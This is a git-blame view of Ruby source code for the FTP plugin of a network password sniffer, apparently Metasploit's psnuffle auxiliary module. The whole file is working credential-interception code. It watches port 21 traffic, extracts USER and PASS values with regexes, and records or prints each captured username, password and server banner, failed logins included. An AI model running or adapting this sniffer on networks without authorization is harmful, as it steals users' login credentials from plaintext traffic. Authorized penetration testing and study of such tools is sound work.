2009-08-19 14:07:33 +00:00
|
|
|
# Psnuffle password sniffer add-on class for ftp
|
|
|
|
# part of psnuffle sniffer auxiliary module
|
|
|
|
#
|
|
|
|
# When db is available reports go into db
|
|
|
|
# Also incorrect credentials are sniffed but marked
|
|
|
|
# as unsuccessful logins... (Typos are common :-) )
|
|
|
|
#
|
|
|
|
|
2009-07-17 20:39:06 +00:00
|
|
|
class SnifferFTP < BaseProtocolParser
|
2009-08-19 14:07:33 +00:00
|
|
|
|
2009-07-17 20:39:06 +00:00
|
|
|
def register_sigs
|
2009-08-19 14:07:33 +00:00
|
|
|
self.sigs = {
|
2009-11-02 17:59:45 +00:00
|
|
|
:banner => /^(220\s*[^\r\n]+)/i,
|
|
|
|
:user => /^USER\s+([^\s]+)/i,
|
|
|
|
:pass => /^PASS\s+([^\s]+)/i,
|
|
|
|
:login_pass => /^(230\s*[^\n]+)/i,
|
|
|
|
:login_fail => /^(5\d\d\s*[^\n]+)/i,
|
2009-07-17 20:39:06 +00:00
|
|
|
}
|
|
|
|
end
|
2009-11-02 17:59:45 +00:00
|
|
|
|
2009-07-17 20:39:06 +00:00
|
|
|
def parse(pkt)
|
|
|
|
|
|
|
|
# We want to return immediatly if we do not have a packet which is handled by us
|
|
|
|
return if not pkt[:tcp]
|
|
|
|
return if (pkt[:tcp].src_port != 21 and pkt[:tcp].dst_port != 21)
|
2009-08-19 14:07:33 +00:00
|
|
|
s = find_session((pkt[:tcp].dst_port == 21) ? get_session_src(pkt) : get_session_dst(pkt))
|
2009-07-17 20:39:06 +00:00
|
|
|
|
|
|
|
self.sigs.each_key do |k|
|
|
|
|
# There is only one pattern per run to test
|
|
|
|
matched = nil
|
|
|
|
matches = nil
|
|
|
|
|
2009-07-25 14:11:55 +00:00
|
|
|
if(pkt[:tcp].payload_data =~ self.sigs[k])
|
2009-07-17 20:39:06 +00:00
|
|
|
matched = k
|
|
|
|
matches = $1
|
|
|
|
end
|
|
|
|
|
|
|
|
case matched
|
2009-11-02 17:59:45 +00:00
|
|
|
|
2009-08-19 14:07:33 +00:00
|
|
|
when :login_fail
|
2009-07-17 20:39:06 +00:00
|
|
|
if(s[:user] and s[:pass])
|
2009-08-19 14:07:33 +00:00
|
|
|
s[:proto]="ftp"
|
2009-11-02 17:59:45 +00:00
|
|
|
s[:extra]="Failed Login. Banner: #{s[:banner]}"
|
2009-08-19 14:07:33 +00:00
|
|
|
report_auth_info(s)
|
|
|
|
print_status("Failed FTP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")
|
2009-07-17 20:39:06 +00:00
|
|
|
|
2009-08-19 14:07:33 +00:00
|
|
|
s[:pass]=""
|
|
|
|
return
|
|
|
|
end
|
2009-07-17 20:39:06 +00:00
|
|
|
|
2009-08-19 14:07:33 +00:00
|
|
|
when :login_pass
|
|
|
|
if(s[:user] and s[:pass])
|
|
|
|
s[:proto]="ftp"
|
2009-11-02 17:59:45 +00:00
|
|
|
s[:extra]="Successful Login. Banner: #{s[:banner]}"
|
2009-08-19 14:07:33 +00:00
|
|
|
report_auth_info(s)
|
|
|
|
print_status("Successful FTP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")
|
|
|
|
# Remove it form the session objects so freeup memory
|
2009-07-17 20:39:06 +00:00
|
|
|
sessions.delete(s[:session])
|
2009-08-19 14:07:33 +00:00
|
|
|
return
|
2009-07-17 20:39:06 +00:00
|
|
|
end
|
2009-11-02 17:59:45 +00:00
|
|
|
|
2009-07-17 20:39:06 +00:00
|
|
|
when :banner
|
2009-08-19 14:07:33 +00:00
|
|
|
# Because some ftp server send multiple banner we take only the first one and ignore the rest
|
2009-07-17 20:39:06 +00:00
|
|
|
if not (s[:banner])
|
|
|
|
sessions[s[:session]].merge!({k => matches})
|
2009-08-19 14:07:33 +00:00
|
|
|
s[:name]="FTP Server Welcome Banner: \"#{s[:banner]}\""
|
2009-11-02 17:59:45 +00:00
|
|
|
report_service(s)
|
2009-07-17 20:39:06 +00:00
|
|
|
end
|
2009-08-19 14:07:33 +00:00
|
|
|
|
2009-07-17 20:39:06 +00:00
|
|
|
when nil
|
|
|
|
# No matches, no saved state
|
|
|
|
else
|
|
|
|
sessions[s[:session]].merge!({k => matches})
|
|
|
|
end # end case matched
|
2009-11-02 17:59:45 +00:00
|
|
|
|
2009-07-17 20:39:06 +00:00
|
|
|
end # end of each_key
|
|
|
|
end # end of parse
|
|
|
|
end
|
2009-11-02 17:59:45 +00:00
|
|
|
|